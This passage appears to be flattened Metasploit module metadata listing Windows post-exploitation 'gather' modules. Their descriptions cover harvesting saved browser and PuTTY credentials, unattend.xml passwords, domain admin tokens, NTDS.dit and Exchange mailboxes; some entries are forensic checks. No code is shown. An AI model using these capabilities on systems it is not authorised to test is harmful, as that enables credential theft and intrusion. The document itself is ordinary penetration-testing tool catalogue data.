true, - "ref_name": "windows/gather/enum_domains", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_emet": { - "name": "Windows Gather EMET Protected Paths", - "fullname": "post/windows/gather/enum_emet", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vysec " - ], - "description": "This module will enumerate the EMET protected paths on the target host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_emet.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_emet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_files": { - "name": "Windows Gather Generic File Collection", - "fullname": "post/windows/gather/enum_files", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "3vi1john ", - "RageLtMan " - ], - "description": "This module downloads files recursively based on the FILE_GLOBS option.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_files.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_files", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_hostfile": { - "name": "Windows Gather Windows Host File Enumeration", - "fullname": "post/windows/gather/enum_hostfile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module returns a list of entries in the target system's hosts file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_hostfile.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_hostfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_hyperv_vms": { - "name": "Windows Hyper-V VM Enumeration", - "fullname": "post/windows/gather/enum_hyperv_vms", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "gwillcox-r7" - ], - "description": "This module will check if the target machine is a Hyper-V host and, if it is, will return a list of all\n of the VMs running on the host, as well as stats such as their state, version, CPU Usage, uptime, and status.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/post/windows/gather/enum_hyperv_vms.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_hyperv_vms", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ie": { - "name": "Windows Gather Internet Explorer User Data Enumeration", - "fullname": "post/windows/gather/enum_ie", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kx499" - ], - "description": "This module will collect history, cookies, and credentials (from either HTTP\n auth passwords, or saved form passwords found in auto-complete) in\n Internet Explorer. The ability to gather credentials is only supported\n for versions of IE >=7, while history and cookies can be extracted for all\n versions.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ie.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ie", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_logged_on_users": { - "name": "Windows Gather Logged On User Enumeration (Registry)", - "fullname": "post/windows/gather/enum_logged_on_users", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate current and recently logged on Windows users.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-08 01:50:36 +0000", - "path": "/modules/post/windows/gather/enum_logged_on_users.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_logged_on_users", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "powershell", - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ms_product_keys": { - "name": "Windows Gather Product Key", - "fullname": "post/windows/gather/enum_ms_product_keys", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon Perry " - ], - "description": "This module will enumerate Microsoft product license keys.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-21 16:00:27 +0000", - "path": "/modules/post/windows/gather/enum_ms_product_keys.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ms_product_keys", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_muicache": { - "name": "Windows Gather Enum User MUICache", - "fullname": "post/windows/gather/enum_muicache", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "TJ Glad " - ], - "description": "This module gathers information about the files and file paths that logged on users have\n executed on the system. It also will check if the file still exists on the system. This\n information is gathered by using information stored under the MUICache registry key. If\n the user is logged in when the module is executed it will collect the MUICache entries\n by accessing the registry directly. If the user is not logged in the module will download\n users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are\n parsed from the downloaded hive.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_muicache.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_muicache", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_onedrive": { - "name": "OneDrive Sync Provider Enumeration Module", - "fullname": "post/windows/gather/enum_onedrive", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will identify the Office 365 OneDrive endpoints for both business and personal accounts\n across all users (providing access is permitted). It is useful for identifying document libraries\n that may otherwise not be obvious which could contain sensitive or useful information.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/windows/gather/enum_onedrive.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_onedrive", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_patches": { - "name": "Windows Gather Applied Patches", - "fullname": "post/windows/gather/enum_patches", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "zeroSteiner ", - "mubix " - ], - "description": "This module enumerates patches applied to a Windows system using the\n WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-23 17:41:20 +0000", - "path": "/modules/post/windows/gather/enum_patches.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_patches", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_powershell_env": { - "name": "Windows Gather PowerShell Environment Setting Enumeration", - "fullname": "post/windows/gather/enum_powershell_env", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate Microsoft PowerShell settings.", - "references": [ - "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies", - "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-01 00:56:21 +0000", - "path": "/modules/post/windows/gather/enum_powershell_env.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_powershell_env", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_prefetch": { - "name": "Windows Gather Prefetch File Information", - "fullname": "post/windows/gather/enum_prefetch", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "TJ Glad " - ], - "description": "This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems\n and current values of related registry keys. From each prefetch file we'll collect\n filetime (converted to utc) of the last execution, file path hash, run count, filename\n and the execution path.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_prefetch.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_prefetch", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_proxy": { - "name": "Windows Gather Proxy Setting", - "fullname": "post/windows/gather/enum_proxy", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module pulls a user's proxy settings. If neither RHOST or SID\n are set it pulls the current user, else it will pull the user's settings\n for the specified SID and target host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-12-04 15:10:47 +0000", - "path": "/modules/post/windows/gather/enum_proxy.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_proxy", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_putty_saved_sessions": { - "name": "PuTTY Saved Sessions Enumeration Module", - "fullname": "post/windows/gather/enum_putty_saved_sessions", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session\n information from the registry. PuTTY is very configurable; some users may have configured\n saved sessions which could include a username, private key file to use when authenticating,\n host name etc. If a private key is configured, an attempt will be made to download and store\n it in loot. It will also record the SSH host keys which have been stored. These will be connections that\n the user has previously after accepting the host SSH fingerprint and therefore are of particular\n interest if they are within scope of a penetration test.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_putty_saved_sessions", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_services": { - "name": "Windows Gather Service Info Enumeration", - "fullname": "post/windows/gather/enum_services", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Keith Faber", - "Kx499" - ], - "description": "This module will query the system for services and display name and\n configuration info for each returned service. It allows you to\n optionally search the credentials, path, or start type for a string\n and only return the results that match. These query operations are\n cumulative and if no query strings are specified, it just returns all\n services. NOTE: If the script hangs, windows firewall is most likely\n on and you did not migrate to a safe process (explorer.exe for\n example).", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-09 17:27:19 +0000", - "path": "/modules/post/windows/gather/enum_services.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_services", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_shares": { - "name": "Windows Gather SMB Share Enumeration via Registry", - "fullname": "post/windows/gather/enum_shares", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate configured and recently used file shares.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-02 17:34:32 +0000", - "path": "/modules/post/windows/gather/enum_shares.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_shares", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "powershell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_snmp": { - "name": "Windows Gather SNMP Settings", - "fullname": "post/windows/gather/enum_snmp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Tebo " - ], - "description": "This module will enumerate the SNMP service configuration.", - "references": [ - "MSB-MS00-096", - "URL-https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-096" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-13 17:45:10 +0000", - "path": "/modules/post/windows/gather/enum_snmp.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_snmp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "powershell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_termserv": { - "name": "Windows Gather Terminal Server Client Connection Information Dumper", - "fullname": "post/windows/gather/enum_termserv", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module dumps MRU and connection data for RDP sessions.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_termserv.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_termserv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_tokens": { - "name": "Windows Gather Enumerate Domain Admin Tokens (Token Hunter)", - "fullname": "post/windows/gather/enum_tokens", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Abraham " - ], - "description": "This module enumerates Domain Admin account processes and delegation tokens.\n\n This module will first check if the session has sufficient privileges\n to replace process level tokens and adjust process quotas.\n\n The SeAssignPrimaryTokenPrivilege privilege will not be assigned if\n the session has been elevated to SYSTEM. In that case try first\n migrating to another process that is running as SYSTEM.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_tokens.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_tokens", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_tomcat": { - "name": "Windows Gather Apache Tomcat Enumeration", - "fullname": "post/windows/gather/enum_tomcat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Barry Shteiman " - ], - "description": "This module will collect information from a Windows-based Apache Tomcat. You will get\n information such as: The installation path, Tomcat version, port, web applications,\n users, passwords, roles, etc.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_tomcat.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_tomcat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_trusted_locations": { - "name": "Windows Gather Microsoft Office Trusted Locations", - "fullname": "post/windows/gather/enum_trusted_locations", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vysec " - ], - "description": "This module will enumerate the Microsoft Office trusted locations on the target host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_trusted_locations.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_trusted_locations", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_unattend": { - "name": "Windows Gather Unattended Answer File Enumeration", - "fullname": "post/windows/gather/enum_unattend", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sean Verity ", - "sinn3r ", - "Ben Campbell ", - "GhostlyBox" - ], - "description": "This module will check the file system for a copy of unattend.xml and/or\n autounattend.xml found in Windows Vista, or newer Windows systems. And then\n extract sensitive information such as usernames and decoded passwords. Also\n checks for '.vmimport' files that could have been created by the AWS EC2 VMIE service.", - "references": [ - "URL-http://technet.microsoft.com/en-us/library/ff715801", - "URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx", - "URL-http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580", - "URL-https://aws.amazon.com/security/security-bulletins/AWS-2024-006/", - "URL-https://www.immersivelabs.com/blog/the-return-of-unattend-xml-revenge-of-the-cleartext-credentials/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_unattend.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_unattend", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/exchange": { - "name": "Windows Gather Exchange Server Mailboxes", - "fullname": "post/windows/gather/exchange", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "SophosLabs Offensive Security team" - ], - "description": "This module will gather information from an on-premise Exchange Server running on the target machine.\n\n Two actions are supported:\n LIST (default action): List basic information about all Exchange servers and mailboxes hosted on the target.\n EXPORT: Export and download a chosen mailbox in the form of a .PST file, with support for an optional filter keyword.\n\n For a list of valid filters, see https://docs.microsoft.com/en-us/exchange/filterable-properties-for-the-contentfilter-parameter\n\n The executing user has to be assigned to the \"Organization Management\" role group for the module to successfully run.\n\n Tested on Exchange Server 2010 on Windows Server 2012 R2 and Exchange Server 2016 on Windows Server 2016.", - "references": [ - "URL-https://github.com/sophoslabs/metasploit_gather_exchange", - "URL-https://news.sophos.com/en-us/2021/03/09/sophoslabs-offensive-security-releases-post-exploitation-tool-for-exchange/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/exchange.rb", - "is_install_path": true, - "ref_name": "windows/gather/exchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "EXPORT", - "description": "Export and download a chosen mailbox in the form of a .PST file, with support for an optional filter keyword" - }, - { - "name": "LIST", - "description": "List basic information about all Exchange servers and mailboxes hosted on the target" - } - ] - }, - "post_windows/gather/file_from_raw_ntfs": { - "name": "Windows File Gather File from Raw NTFS", - "fullname": "post/windows/gather/file_from_raw_ntfs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Danil Bazin " - ], - "description": "This module gathers a file using the raw NTFS device, bypassing some Windows restrictions\n such as open file with write lock. Because it avoids the usual file locking issues, it can\n be used to retrieve files such as NTDS.dit.", - "references": [ - "URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-03 12:57:40 +0000", - "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb", - "is_install_path": true, - "ref_name": "windows/gather/file_from_raw_ntfs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/browser_history": { - "name": "Windows Gather Skype, Firefox, and Chrome Artifacts", - "fullname": "post/windows/gather/forensics/browser_history", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Harper " - ], - "description": "Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/browser_history.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/browser_history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/duqu_check": { - "name": "Windows Gather Forensics Duqu Registry Check", - "fullname": "post/windows/gather/forensics/duqu_check", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Marcus J. Carey " - ], - "description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.", - "references": [ - "CVE-2011-3402", - "URL-http://r-7.co/w5h7fY" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/duqu_check.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/duqu_check", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/enum_drives": { - "name": "Windows Gather Physical Drives and Logical Volumes", - "fullname": "post/windows/gather/forensics/enum_drives", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley McGrew " - ], - "description": "This module will list physical drives and logical volumes", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/enum_drives.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/enum_drives", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/fanny_bmp_check": { - "name": "FannyBMP or DementiaWheel Detection Registry Check", - "fullname": "post/windows/gather/forensics/fanny_bmp_check", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "William M." - ], - "description": "This module searches for the Fanny.bmp worm related reg keys.\n fannybmp is a worm that exploited zero day vulns\n (more specifically, the LNK Exploit CVE-2010-2568).\n Which allowed it to spread even if USB Autorun was turned off.\n This is the same exploit that was used in StuxNet.", - "references": [ - "URL-https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787", - "CVE-2010-2568" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/gather/forensics/fanny_bmp_check.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/fanny_bmp_check", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/imager": { - "name": "Windows Gather Forensic Imaging", - "fullname": "post/windows/gather/forensics/imager", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley McGrew " - ], - "description": "This module will perform byte-for-byte imaging of remote disks and volumes.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/imager.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/imager", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/nbd_server": { - "name": "Windows Gather Local NBD Server", - "fullname": "post/windows/gather/forensics/nbd_server", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley McGrew " - ], - "description": "Maps remote disks and logical volumes to a local Network Block Device server.\n Allows for forensic tools to be executed on the remote disk directly.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/nbd_server.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/nbd_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/recovery_files": { - "name": "Windows Gather Deleted Files Enumeration and Recovering", - "fullname": "post/windows/gather/forensics/recovery_files", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module lists and attempts to recover deleted files from NTFS file systems. Use\n the FILES option to guide recovery. Leave this option empty to enumerate deleted files in the\n DRIVE. Set FILES to an extension (e.g., \"pdf\") to recover deleted files with that\n extension, or set FILES to a comma separated list of IDs (from enumeration) to\n recover those files. The user must have account file enumeration. Recovery\n may take a long time; use the TIMEOUT option to abort enumeration or recovery by\n extension after a specified period (in seconds).", - "references": [ - "URL-https://www.youtube.com/watch?v=9yzCf360ujY&hd=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": 